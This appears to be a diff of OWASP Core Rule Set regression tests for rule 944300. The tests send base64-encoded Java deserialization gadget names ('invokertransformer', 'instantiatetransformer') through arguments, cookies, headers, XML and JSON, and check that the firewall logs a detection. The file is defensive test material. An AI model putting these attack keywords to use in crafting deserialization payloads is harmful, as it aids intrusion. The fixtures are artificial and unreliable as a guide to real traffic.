stage: - input: - dest_addr: "127.0.0.1" - port: 
80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-184 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 184 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-185 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + 
- test_id: 185 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-186 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 186 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-187 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_id: 187 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-188 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 188 desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-189 + - input: + dest_addr: "127.0.0.1" + port: 80 
+ headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 189 desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-190 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_id: 190 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-191 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 191 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-192 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 192 desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-193 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 193 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-194 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + 
version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 194 desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-195 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 195 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-196 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 196 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-197 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 197 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-198 + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_id: 198 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-199 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 199 desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-200 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 200 desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-201 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_id: 201 desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-202 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 202 desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-203 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"test=value" + output: + log_contains: "id \"944300\"" + - test_id: 203 desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-204 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 204 desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-205 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 205 desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-206 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 206 desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-207 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 207 desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-208 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 208 desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" 
